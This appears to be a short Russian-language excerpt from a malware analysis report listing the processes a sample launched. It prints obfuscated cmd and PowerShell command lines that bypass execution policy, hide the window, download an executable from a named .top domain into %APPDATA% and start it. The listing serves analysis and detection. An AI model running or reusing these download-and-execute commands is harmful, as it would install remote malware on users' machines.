Техническая информация
- '<SYSTEM32>\cmd.exe' /c "P^O^w^ErShEl^l.^E^x^E ^-eXe^C^UtionP^OLi^CY BYP^aS^s ^-nO^proFile -wiN^D^O^W^StY^le^ hiddEN ^(nE^w^-obJE^CT sy^stE^m^.NeT^.^WeBcLIE^nt^).D^o^wn^lOEN ^'http://www.fapoe...
- '<SYSTEM32>\cmd.exe' /c "P^O^w^ErShEl^l.^E^x^E ^-eXe^C^UtionP^OLi^CY BYP^aS^s ^-nO^proFile -wiN^D^O^W^StY^le^ hiddEN ^(nE^w^-obJE^CT sy^stE^m^.NeT^.^WeBcLIE^nt^).D^o^wn^lOEN ^'http://www.fapoe...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -eXeCUtionPOLiCY BYPaSs -nOproFile -wiNDOWStYle hiddEN (nEw-obJECT systEm.NeT.WeBcLIEnt).DownlOEN 'http://www.fapoergol.top/read.php?f=1.gif','%APPDATA%.Exe');start-proceSs '...